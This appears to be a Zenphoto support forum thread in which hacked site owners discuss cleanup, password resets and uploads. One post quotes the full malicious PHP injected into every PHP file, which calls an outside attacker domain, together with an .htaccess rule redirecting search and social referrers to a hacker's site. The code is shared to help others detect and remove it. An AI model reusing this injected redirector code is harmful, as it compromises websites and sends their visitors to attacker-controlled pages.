Zenphoto
The simpler media website CMS
ZenphotoThe simpler media website CMS
Forum search only. You might also want to search on the main site's user guide.
Your support helps pay for this server, and helps development of zenphoto. Thank you!
Visit the donations page
Comments
It's very good thing...
Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well) as the 1.4.1.x line was actually considered complete. This has been announced a week or so ago.
P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.
The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.
Mi site was also hacked. I think no is clear but I didn't deleted jpg files with photos. How can I check are they not infected ?
I can not get any details as to which file it objects to.
Has this been an issue for anyone else?
Which seems to mean the only way to add photos is via the web page upload.
Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.
Any help is appreciated.
It is the "Images" tab that provided the means for uploading photos. It is still present and operational.
Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.
Thanks so much for your quick response. It is really appreciated.
my site was hacked and i lost a lot of informations
The hacker succeeded to download the [link removed by moderator] file and execute it. It has mostly to remove all files owned by apache.
I hope this will help someone !
i'm ok for this. So the zip contain no virus but a php,perl and sql files. The php file is similar to ajaxterm. I think that my issue could help someone.
If you want i post the php file screenshot : http://tinypic.com/r/301ev89/5
After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.
They suggested this:
1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.
2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.
We did that. We asked Google to scan the site also. Still waiting...
My problem now is that my logins and passwords were wiped out at ZP and I cannot get in.
Anything wth fotofill.net in it is being blocked ny browsers. Can someone help me get to my zp-core? Thanks
There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.
Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.
1. Delete ajax upload manager folder inside of zenphoto
2. Install latest zenphoto release
3. Go through all php and .htaccess files on the website to ensure they are clean
Does that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.
Thank you for your help!
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
For reference, the hackers added this to the top of all PHP files:
`global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo ""; echo " RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L]
`
Thanks!
http://www.zenphoto.org/support/topic.php?id=9951#post-58366
different referring domain
all my wordpress files, piwik, sigh
Is this normal activity for zengallery?
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
`rss_Screenshots_screenshots_en_US.xml`
This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.
Look for an .htaccess file. In my case, that's where all of the redirection code was injected.
hth,
moo